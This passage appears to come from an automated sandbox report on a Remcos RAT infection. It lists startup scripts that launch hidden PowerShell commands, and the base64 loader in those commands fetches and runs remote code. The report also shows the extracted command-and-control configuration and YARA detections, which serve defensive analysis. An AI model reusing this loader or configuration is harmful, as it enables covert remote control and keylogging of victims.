1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5384 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a0b1d30.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2984 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a0b1d30.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3496 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_406c4ae3.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1720 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_406c4ae3.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2640 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b50e3cba.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5296 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b50e3cba.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5408 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2258141973.000000000B4F1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x8b0a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    • 0x12ce2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000022.00000002.2751486587.0000000008A87000.00000002.10000000.00040000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.2252250805.0000000007437000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000003B.00000002.3849765879.0000000008920000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000004F.00000002.4760119344.000000000651F000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x7a9b2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          Click to see the 100 entries
          SourceRuleDescriptionAuthorStrings
